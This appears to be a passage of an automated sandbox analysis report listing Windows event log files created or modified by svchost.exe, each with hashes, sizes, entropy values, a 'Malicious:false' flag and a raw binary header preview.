                                        SHA-512:E6642A332446467BF9D5DF8FF402EDF4184CA26FC50D8D224FFBDF0504E8B0E750BCC6664E9AE3F84BBC1A9E8F945F3D77B8BAF8F3A2E4FD971FD6EEC6E1E4B2
                                        Malicious:false
                                        Preview:ElfChnk.........P...............P...............8...D......................................................................./..................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................`..................=...............................................................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Shimuser%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):2.24409357808026
                                        Encrypted:false
                                        SSDEEP:384:mhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zS:mmw9g3LYx
                                        MD5:3E92F94FE6AA3FDC475D1591EF7E2704
                                        SHA1:B078DB603A5949847827FFD1EA107D357C22D6F8
                                        SHA-256:FD11BA3444675A33C4263FEAFDC9DD37E8061968D02E9BB4800B7E22D123DEB9
                                        SHA-512:A5362EB798F2F827B99F074F72D5B1208BDC89A23F152C85C3C8F9200B217F9F3E415A42B59D00D0DA765992DB085A9E47F63AC273404C95C914351150A8A4E8
                                        Malicious:false
                                        Preview:ElfChnk.........9...............9............t...v...4........................................................................x................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E............X..........n.......#...............................................................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.9546787598621266
                                        Encrypted:false
                                        SSDEEP:192:ssgV71IUKGGk4yb27x1IMb27kdI2dIeWIbTcc2eI5Tcc:8h1IUbGk4NIsIKINIDI
                                        MD5:BA45982149D644A9243DF5BA6EB08A81
                                        SHA1:6DD8A1A7503D8323B24669AE91EA9C1308E30B15
                                        SHA-256:29302E33B11EBCBC0560A52847583AE37F2A2A72976A23F4AD71393E4FEBDBD4
                                        SHA-512:E0F1B9B471A40FC848A124DD0261FBC66B82FF3D9CC0DD655C8A6E2D9FBEEF0B9E1070D424589D8C3A57E0976A62B00AFC5BDF8B716B9D05DA5BE97B7B698AB5
                                        Malicious:false
                                        Preview:ElfChnk.K.......P.......K.......P............S...j...N.(...................................................................../..................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...................................................................................................**..x...K.......`~.%W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 130, DIRTY
                                        Category:dropped
                                        Size (bytes):70168
                                        Entropy (8bit):4.522804099045985
                                        Encrypted:false
                                        SSDEEP:768:gWYwLMrDWYwLMrWEQ8QtnkVKRNlY20sMY3Dp13/n/ydIxm6g/ZSi+uQ/NujMAEWC:Tp
                                        MD5:50F25C4C4C56F033FAF529180FA1361D
                                        SHA1:AA7BC663AD2C4B29D1C01A87F1D2FEAAAF5D13CC
                                        SHA-256:5E5365809AAAC7334E7F1DB52B2CB85F6848A0A2FAE520598662C5CE2D381600
                                        SHA-512:F352029BA9C3DF502354FEC260E090BEEBF4A0BFADF56CD20F9FA1AE0A38B86FA3CAEE1743C87896DF5CA658A7783402D8FE1A2E5DBCB960973362FD6F03A815
                                        Malicious:false
                                        Preview:ElfFile.....................................................................................................................T...ElfChnk.~...............~............................\__.....................................................................20]................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...................................................................................................**..x...~...........U..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):74072
                                        Entropy (8bit):5.6718697150717405
                                        Encrypted:false
                                        SSDEEP:384:ua5q29o2KDzyzIzba5WzuzNz0zxzuewKWMK5a5LhAa5DpzuzNz0zxzuewKWMKFNN:bO0QqjaXI6AlcrwZ0
                                        MD5:21AAFAB24805605491920463D78C08CB
                                        SHA1:FC4932961993965CF4297FA60ECC75D605503AC6
                                        SHA-256:02E08CEDB37B351504AF8511E631AE8CFEC26DF9E9779D74C487E9DABE634EC1
                                        SHA-512:6CEF1E9FC88A035AA00BA197385FE1D61678541133BD5257E05BBB307777AD473E346C8DFA4D6F76AF0B3A31B9094AE9CBE98DFEE73CE8A19524EDDBCCEF3610
                                        Malicious:false
                                        Preview:ElfChnk.q...............q............................J.$....................................................................5...................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F...............................................&........................................O..............................................)...q.......**................&f...........Z7;&...............................................................0.......H...Z.!........... ....@..&f....}QH..8D....5...h...\............................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.L.i.v.e.I.d..%....gN.BiVz..OM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.L.i.v.e.I.d./.O.p.e.r.a.t.i.o.n.a.l......s........G...<s:Envelope><s:Header><wsa:Action s:mustUnderstand="1">*</wsa:Action><wsa:To s:mustUnderstand="1">*</wsa:To><wsa:MessageID>*</wsa:Messa

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):1.0906234381604036
                                        Encrypted:false
                                        SSDEEP:384:1h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMOrMM/uMZeiMa:1eJw
                                        MD5:C5FF06DD8BE524B616F8663522CECD8F
                                        SHA1:C4103F0987D75AFE225436B8039C57F7CE40BDBA
                                        SHA-256:BE9EA2824B5985A8CA71792C629FCBAD2FE3267613E560F55512E1439F8D89DC
                                        SHA-512:2839A4B7356AA30DEA18794D81C10A81D4CB79C76380681EEBA6427D843DED6BB0A0B37AAA4AAF7715DE4C31DA9D30DFC1CF70F662E83B29CE8DC24EF1522DB3
                                        Malicious:false
                                        Preview:ElfChnk.....................................X0...1...p{{....................................................................s.\.........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................6(..................................................................................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.3544648067172504
                                        Encrypted:false
                                        SSDEEP:384:chz1g1z1f1m51F1Z191f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS10r:c2jdjP0cs5uP/ub
                                        MD5:5E01D7C4731FBE5625EEC0680D1037F1
                                        SHA1:F5889D115B9E5869538E908EFFD8B28A0BB72462
                                        SHA-256:73D8518E4715F852C806A157EAD1506A36AABF4BDE478DCEFF96A84D81E27AE6
                                        SHA-512:1FC15D0D1B817E648209CC72E14EDBFCBC8CC827C70DAE75D8C8A5465927BDBD6142D73F203F3240D259F38A2451E555D763D07BA10F5CA47B200733AD37CC1C
                                        Malicious:false
                                        Preview:ElfChnk.....................................(.........O.......................................................................................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...........................................I.......................................................**.................WW..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):3.2141136432953736
                                        Encrypted:false
                                        SSDEEP:384:KzhDIEQAGxIHIFIWbIfEITOIHI2IjWWIfEITFIrIPIhIwItIFFIf1ITMsVIfIMIt:KzZxGq00U57
                                        MD5:C812FAD5A52C2B87870EB0463096097F
                                        SHA1:CEB4BE4FD9F07420C253E3A7879CCB02C68F864D
                                        SHA-256:401A6D6FB8BF407738B9369097CF34576832C6EC188A5C41B95FCCF00B90B58B
                                        SHA-512:CF6BB8CB98EBE26164A50D7728E3ABDA6C7E77A94F6E597C03F81E97DE58749DD96530EEDD1D1FC42E8FF68BBDEEA9951AA80E2985B15F8E3737A45D32165EF3
                                        Malicious:false
                                        Preview:ElfChnk.T...............T...................h.........c.......................................................................%.........................................>...=...........................................................................................................................f...............?...........................m...................M...F................................................(..........as..................1..................................................................**......T.......B..d..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.8285527879711732
                                        Encrypted:false
                                        SSDEEP:384:G2h6iIvcImIvITIQIoIoI3IEIMIoIBIbIlMI2I5IEFIzI5I:G2oxOT
                                        MD5:B980C446A2A107517F87CF34ADC83DD9
                                        SHA1:ECCBF6BD7A62E3914DA365893A1AA6D8DDD920CD
                                        SHA-256:CB0BF585620C448F0695AC37A7FFF2A358AED302660B31901C2D060921721FFB
                                        SHA-512:B2732AFC5D98033D990944E61930C3EA57D2ACFEE4A802476721665D7711FA2E9FEDCD7647917FE95AE03CDDC5DD927FA55F08F35CDEFA62EDC7CFD3C7FB5A39
                                        Malicious:false
                                        Preview:ElfChnk......................................#...$...>......................................................................V.=.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................^...................................................................................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):3.1037290630380294
                                        Encrypted:false
                                        SSDEEP:768:n4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH13K:d
                                        MD5:7C3D15939EC70328CB06DAA08EA22573
                                        SHA1:BDA43799C74C483842C457E23EAAD47A136C976C
                                        SHA-256:5CA7B9E56E9708ED4F32F7C0BF086BF107C4A8AE7DBCE974FEB8AF9501D23902
                                        SHA-512:7875BC899CCEC1F62AD34E73A9F61D588BD6A98C2F768FB01FF1865B272FD8337DC15E6B5B18DB9B11DF565C543E2F329A784F73C3CF333B0F526E9F47021A58
                                        Malicious:false
                                        Preview:ElfChnk.....................................@...P...J.{P......................................................................q.................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):81472
                                        Entropy (8bit):3.983900909840639
                                        Encrypted:false
                                        SSDEEP:768:orlJutDBjV8k+z7eUtHpoVWWqPcRkpHrWbGyYKQc90XZ07SZRcZv76NcRUjGHzLB:4utDBjV8k+z7PtHpoVW7k
                                        MD5:051C8670C54D1862D130D6F69FBC193C
                                        SHA1:2C1E88FE9EDD2E9C8F222E57DC36367F26E9AF72
                                        SHA-256:141CD60E0C8064392043B27EB008D280CE5DB3C08B4C4677CDB5EDF98F147E29
                                        SHA-512:9CB41018FD0040EAA5E406019A195DDFFE44672E8A77E3D61D8E4BA59D1A9273254E6EECAFE0EF1DE3E870712C797B7F8AA9455977F3EE6FF9538565551317E9
                                        Malicious:false
                                        Preview:ElfChnk.................Q.......\...........@..........z.....................................................................Q..................6...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................&...................................................................................................**..x...W........$b...........Z7;&...............................................................8.......P.....!..................$b....g..TW...lt.TW...........W........................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.o.w.e.r.S.h.e.l.l.;...@\.K.f<...ZM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.o.w.e.r.S.h.e.l.l./.O.p.e.r.a.t.i.o.n.a.l......L..........P.o.ix...**......X.........>b...........Z7;&...............................................................8.......P...C.

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.639996114613263
                                        Encrypted:false
                                        SSDEEP:384:ShsKhoKxK2KIKnKpkMK0KtKPKtK3LKXmKZKaK2KVKKK3KAKwKwKiKVKyKGKpKVtt:SFb5pORi7mEFZqZl+pNcg6E3wr/5O
                                        MD5:B2FB71BE84D5955903D003AD082AEC6B
                                        SHA1:061B39081A483E2724A670FF33630605A669A8A9
                                        SHA-256:865240FB621D235E7A3FA0800470123685F7F70CF653D307EE458EBD8EEC6410
                                        SHA-512:14D89B65D6F5C833388C7DEC81DC24D0FDC76CA434A9F910B019AF1370BF323FC7C6ACF4606A182F8A968E0553F7D42FB2B1B7D4EB643962330CC62B63495FC0
                                        Malicious:false
                                        Preview:ElfChnk.............................................T.......................................................................&.,................t...........................=...........................................................................................................................f...............?...........................m...................M...F........................!..................7>..&...w...........M.../5..G........%...................................a..OL......OF...............I..**.................W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.7906584955348045
                                        Encrypted:false
                                        SSDEEP:384:MhP8o8Z85848V8M8g8D8R8E8y8JB8M848r898:MN
                                        MD5:4581429C5AA67A59E35288D5B0B55942
                                        SHA1:F0B9983D5700F829CBB975F501FBA322F5522593
                                        SHA-256:DEDCEFB3F18D3B36D8D27631F4DF73637937BF907FB1EB891CCEA1C14C19F44D
                                        SHA-512:96E95B4DA3F900B38F6B53121AA9C142B85242F3C287233D93B191CE08C1E89280FAAA52A6EEFFE0E04ED282CD6374AF8286E2C905004C651AAC78FFEAEF7E19
                                        Malicious:false
                                        Preview:ElfChnk.....................................8!..."..V.1.....................................................................8..Z........................................V...=...........................................................................................................................f...............?...........................m...................M...F...............................................v...........&.......................................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):3.7668614069217146
                                        Encrypted:false
                                        SSDEEP:1536:kXhfUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:kXZnS
                                        MD5:A5BD277E74EB6F1062F6F6529CD4B41C
                                        SHA1:A979788C15B6992F30511279C3E988DD4B2A8A9D
                                        SHA-256:1AF918437E2BB3A56F2167692178D0700A451951BC7EFDB8652741C6DA539228
                                        SHA-512:65FB0FA1C51AF32B3A927DF40E691672A304DDE9F43FAAAE97D40EA6BD15C60E1AA8F9F36B6F82AF6C283BCBE353E154D38DF183E8956369D816210FD3842262
                                        Malicious:false
                                        Preview:ElfChnk.........(...............(............J..xL...[.E....................................................................?...................v...........................=...........................................................................................................................f...............?...........................m...................M...F................................................9..........&...............................................................O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):2.551634567387031
                                        Encrypted:false
                                        SSDEEP:768:L0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O6aGyRvF5UN5325Oi5Z:RcEN
                                        MD5:9FE9303D437AE64AE7D6F84406623E46
                                        SHA1:A7CE105D08F7A28F815B5BF171B3EDEB56E5CFF5
                                        SHA-256:81E629C26EF40A78C5E60E749498BE53744A0D618273BE5AF3DA048009D7345C
                                        SHA-512:F08582C238A2B6E2257F16B30DB0D407980129438D57099E92CA9FDE99A55B84B814FBDEC73A164B4A5BB792906AE2C5C88E63FA71FBDA472276B3CAE68C4CC9
                                        Malicious:false
                                        Preview:ElfChnk.........C...............C...................<b......................................................................-..s................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&........b..................................................%_..........................]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1912
                                        Entropy (8bit):3.6274601279081162
                                        Encrypted:false
                                        SSDEEP:48:MUiWmUTJCKOrCK3QKB69DyT0zCKOrCK3QkkcqrF+:6UTJCKOrCKg669DyT0zCKOrCKgkkcGF+
                                        MD5:63A0FEF70C45CDDECCB42CF0B1EEAA1B
                                        SHA1:287529BC38DA37EC6856DF8DA6077DE6B7922BE6
                                        SHA-256:21E99D1A37EE8F86193CD1A523DBA194C552C8A98DA0A16196662DC5DAA16BF0
                                        SHA-512:CF1AF456E1CC2BEFACDE22662C5859C40201230C68ED0C8DBB42F3EB7135D606BB3126844E3DDB3EBCC2AE4724DF5BDEA3B3F49263855B8E8ABD0E4F219DB8D1
                                        Malicious:false
                                        Preview:ElfChnk.'.......8.......'.......8...........pv..`y...NI.........................................................................................\...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................5...&...................................................................................................**......7........d=q...........Z7;&...............................................................L.......b.....!..................d=q....}QH..8D....5...d...t...7....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s........J...M..<.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s./.K.e.r.n.e.l.M.o.d.e...!..^5...........h.......>...................................4.\.D.e.v.i.c.e.\.H.a.r.d.d.i.s.k.V.o.l.u.m.e.3.\.W.i

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.327219596727842
                                        Encrypted:false
                                        SSDEEP:384:Npa/hDGCyCkCzCRCFC0CPCqiCEBCzMCy2zCoFC9CKCPCryCaC6CyCU2sF2s2EY2L:Npa/dUwmgU
                                        MD5:39BDE2B4C029E5F2BC6FA244100ED55C
                                        SHA1:EE71625A1DDB5D57B606677AB384B794C2F76741
                                        SHA-256:DACAB8704BF60ED925B8F231A45A4F5A1CA9C87DED892940B518EACA1CDEE266
                                        SHA-512:909A4CE0385AD7D2936C2F73E69F20DFC438304778826AAAE9CEC176E1E10900557A6621608F7CA782CF5B098B98E195AAC432739F81112B12DEF9C0547BD50C
                                        Malicious:false
                                        Preview:ElfChnk.U...............U...........................y.6R....................................................................?...................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F............................H..................f,..........&................................................x..............is......................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.4645121501987095
                                        Encrypted:false
                                        SSDEEP:1536:PrGJSsWdeBDBvwdvx8j00lDL0MBqQtcgVSyCV78AhurLyt2Q4eW+WzpzXepPvMog:PrGJSsWdeBDBvwdvx8j00lDL0MBqQtcU
                                        MD5:AF6B3AF3FEB5952B5CFA4A79A418228D
                                        SHA1:56B7AED9FC54B88B43EDEBBF35599F58610D3488
                                        SHA-256:4C33B557190EB5E003E3537736BEC0EB3B39A6435797B3B2E0B0440F25283A3A
                                        SHA-512:52F7304D50D66DDCF4B936F1089E8A6A56E5BD67037F6991D70A3DF6161C23F7A9D9954648CD4688EAA96ED45D4310822CB3107389B89244E9BC45340A90C98A
                                        Malicious:false
                                        Preview:ElfChnk......................................d..hf..........................................................................H.".................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...................................................................................................**................G.S..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.443690249971798
                                        Encrypted:false
                                        SSDEEP:1536:WM9QuTOc99zPb+zEbINH90Z5kLnOE8EGmwAOXKbGKszQW3XnT04Z6E2nhctHWkw1:WM9QuTOc99zPb+zEbINd0Z5kLnOE8EG4
                                        MD5:B64381690CED676B2065D76EC2079905
                                        SHA1:BDE6781BD8808ECEBF75B84C796CFDA479A76CA5
                                        SHA-256:0F1298AE8D709F3D494B0BB0FE0E9978457CD8BD7F7A347C797406EB26C270D3
                                        SHA-512:6F2885F79B70492E096D3CC30010A4FBF0BB9613935846A67A3A3FDD982DCE4699201DDD4F7793203DE0D3DCF86D9905940A948AFA434BE473B449E0DF6DBA98
                                        Malicious:false
